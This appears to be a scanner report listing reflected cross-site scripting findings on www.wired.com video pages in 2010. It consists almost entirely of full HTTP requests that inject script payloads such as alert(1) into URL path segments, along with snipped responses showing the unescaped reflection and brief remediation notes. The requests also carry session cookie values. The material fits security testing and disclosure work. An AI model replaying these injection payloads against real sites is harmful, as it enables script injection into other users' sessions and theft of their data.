<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos877c6"><a>f389d0665 c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d588"-alert(1)-"05979854152 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos9d588"-alert(1)-"05979854152/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:51:14 GMT Date: Mon, 22 Nov 2010 00:46:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23cf8"><a>abe91b1c201 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights23cf8"><a>abe91b1c201/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:51:31 GMT Date: Mon, 22 Nov 2010 00:46:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights23cf8"><a>abe91b1c201"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9abc"-alert(1)-"7723227df32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightsd9abc"-alert(1)-"7723227df32/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:43 GMT Date: Mon, 22 Nov 2010 00:47:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf961"-alert(1)-"8a5c791c98a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574bf961"-alert(1)-"8a5c791c98a/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:05 GMT Date: Mon, 22 Nov 2010 00:48:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd60e"-alert(1)-"3a818245bb6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40scd60e"-alert(1)-"3a818245bb6/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:52:54 GMT Date: Mon, 22 Nov 2010 00:48:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b836d"-alert(1)-"ccd59f0741 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001b836d"-alert(1)-"ccd59f0741 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:32 GMT Date: Mon, 22 Nov 2010 00:48:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fea0"><a>adc0cc061c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8fea0"><a>adc0cc061c4/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29426 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:42 GMT Date: Mon, 22 Nov 2010 00:45:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8fea0"><a>adc0cc061c4 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8bb21--><script>alert(1)</script>1d4a681cdd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video8bb21--><script>alert(1)</script>1d4a681cdd1/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29461 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:17 GMT Date: Mon, 22 Nov 2010 00:46:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video8bb21--><script>alert(1)</script>1d4a681cdd1/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bc1a"-alert(1)-"126a372399a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos4bc1a"-alert(1)-"126a372399a/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:51:57 GMT Date: Mon, 22 Nov 2010 00:47:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c924"><a>8ffe3551f0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos7c924"><a>8ffe3551f0e/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:20 GMT Date: Mon, 22 Nov 2010 00:46:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos7c924"><a>8ffe3551f0e c_highlights"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78d1e"-alert(1)-"0532cbb1e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights78d1e"-alert(1)-"0532cbb1e6a/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:13 GMT Date: Mon, 22 Nov 2010 00:48:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a01"><a>8733d8ce931 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights36a01"><a>8733d8ce931/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:51:54 GMT Date: Mon, 22 Nov 2010 00:47:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights36a01"><a>8733d8ce931"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40624"-alert(1)-"16bcb075647 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057440624"-alert(1)-"16bcb075647/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:29 GMT Date: Mon, 22 Nov 2010 00:48:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc9c"-alert(1)-"b02f73af82f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff9fc9c"-alert(1)-"b02f73af82f/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:52 GMT Date: Mon, 22 Nov 2010 00:48:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106687
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f1a"-alert(1)-"d99d5ed6aaf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/66614493900140f1a"-alert(1)-"d99d5ed6aaf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:02 GMT Date: Mon, 22 Nov 2010 00:49:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106687
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86308"><a>f32b843750c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video86308"><a>f32b843750c/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29421 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:48 GMT Date: Mon, 22 Nov 2010 00:38:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video86308"><a>f32b843750c ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 290c1--><script>alert(1)</script>bf3897741a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video290c1--><script>alert(1)</script>bf3897741a4/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29460 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:36 GMT Date: Mon, 22 Nov 2010 00:39:36 GMT Connection: close
